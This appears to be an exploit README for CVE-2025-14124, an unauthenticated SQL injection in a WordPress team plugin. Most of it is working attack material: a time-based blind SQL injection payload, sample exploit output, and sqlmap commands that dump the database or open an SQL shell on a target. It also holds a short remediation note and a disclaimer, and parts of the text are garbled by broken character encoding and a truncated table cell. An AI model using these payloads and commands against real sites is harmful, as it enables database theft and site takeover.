## https://sploitus.com/exploit?id=629BA2F5-D514-569F-92EF-99EF376C4D4C
# CVE-2025-14124
## WordPress Team Plugin - Unauthenticated SQL Injection
**Author:** Hyun Chiya
---
## Vulnerability Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-14124 |
| **Plugin** | WordPress Team Plugin |
| **Affected Versions** | esc_like( $this->s['s'] ); // โ ๏ธ esc_like only escapes %, _, \
$where .= "OR ({$wpdb->posts}.post_title LIKE '%{$term}%' ...)"; // โ ๏ธ SQLi!
}
```
**Problem**: `$wpdb->esc_like()` only escapes LIKE wildcards, NOT SQL injection metacharacters.
## Exploitation Flow
```mermaid
flowchart TD
A["Attacker finds page with [tlpteam] shortcode"] --> B["Extract tlp_nonce and data-sc-id"]
B --> C["POST to /wp-admin/admin-ajax.php"]
C --> D["action=ttp_Layout_Ajax_Actionsearch=SQL_PAYLOAD"]
D --> E{"Nonce valid?"}
E -->|Yes| F["SQL query executed with payload"]
F --> G["Time-based detection via SLEEP()"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
style G fill:#51cf66,stroke:#2f9e44,color:#fff
```
## Prerequisites
1. Target has WordPress Team Plugin installed ( โ ๏ธ **Important**: This mode requires **stacked queries** support, which is typically disabled in PHP+MySQL. If stacked queries are not supported, use `--dump` to extract credentials instead, or use `sqlmap --sql-shell` for direct UPDATE execution.
## Example Output
```
>> [ ONLINE ]
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-14124 - WordPress Team Plugin SQL Injection โ
โ Affected: tlp-team > [ INFORMATION ]
[*] Checking if WordPress Team Plugin is active...
[+] Plugin detected: /wp-content/plugins/tlp-team/readme.txt
[+] Plugin detected!
[*] Searching for page with tlpteam shortcode...
[+] Found team page: http://target.com/our-team/
[+] Target page: http://target.com/our-team/
[+] Extracted nonce: abc123def456
[+] Extracted scID: 42
============================================================
[*] EXPLOIT: Time-Based Blind SQL Injection
============================================================
[*] Payload: t' OR SLEEP(3) OR 't'='t
[*] Expected delay: ~9 seconds (SLEEP executes 3 times)
[*] Sending malicious request...
[*] Response time: 9.23 seconds
[+] SQL INJECTION CONFIRMED!
[+] Response delayed by ~9 seconds (expected: 9)
[!] The target is vulnerable to Time-Based Blind SQL Injection
[!] Database can be extracted using tools like sqlmap
[*] Done.
```
## Using with SQLMap
For advanced exploitation, you can use sqlmap after confirming the vulnerability:
```bash
# Dump database
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
--data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
-p search --dbms=mysql --technique=T --batch --dump
# SQL Shell (for UPDATE queries)
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
--data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
-p search --dbms=mysql --technique=T --sql-shell
```
## Remediation
> โ ๏ธ **IMPORTANT**: Update WordPress Team Plugin to version 5.0.11 or later where the vulnerability has been patched with proper SQL escaping using `$wpdb->prepare()`.
## References
- [WPScan Vulnerability Database](https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/)
## Disclaimer
This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly.
## Author
**Hyun Chiya**